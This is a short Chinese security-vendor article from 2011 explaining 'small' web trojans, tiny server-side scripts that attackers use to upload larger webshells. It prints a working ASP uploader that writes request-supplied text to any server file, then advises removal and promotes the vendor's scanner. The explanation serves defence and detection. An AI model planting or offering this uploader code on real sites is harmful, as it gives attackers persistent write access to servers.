• “阿里、腾讯、微软、苏宁、京东、电信”合作服务商
  • 028-658861117X24热线:18080923400
当前位置:护卫神 > 技术杂谈

关于网页木马之小马

时间:2011-08-11 15:46:32

    黑客入侵网站/服务器的方式有很多种,其中一种,就是利用各种手段,将写好的功能强大的脚本放到服务器上,然后找到该脚本的地址运行操作服务器。

 

    其中,就有大马/小马 之说。大马介绍参见:http://www.huweishen.com/help/tech/418.html

 

    大马就是功能更强大的脚本,可以操作磁盘文件,系统设置,创建用户,批量挂马,删除文件等,这类网页木马容易被木马查杀工具查杀;

    相对大马,小马一是功能较弱,二是代码较小,因此被称作小马;

 

    一般地,小马的角色,只是为了将大马传到服务器上,基本代码如下(摘自网络):

 

    dim s
    if request('action') = 'set' then

        Text = request('Text')
        FileName = request('FileName')
        set fs = server.CreateObject('Scripting.FileSystemObject')
        set file = fs.OpenTextFile(server.MapPath(FileName),8,True)
        file.writeline Text
        file.close
        set file = nothing
        set fs = nothing
        response.write '保存成功!'

    end if

 

 

    按照原理分析,小马就是接收数据,并且写数据到磁盘中文件的功能,功能简单,与很多正常文件相似,如果简单查杀,容易影响正常文件,因此很难查杀。

 

    小马的存在,给服务器和网站留下了非常大的隐患,因此建议清理之!

 

    值得一提的是,经过算法改进,护卫神目前可以准确识别绝大多数小马,欢迎您的使用。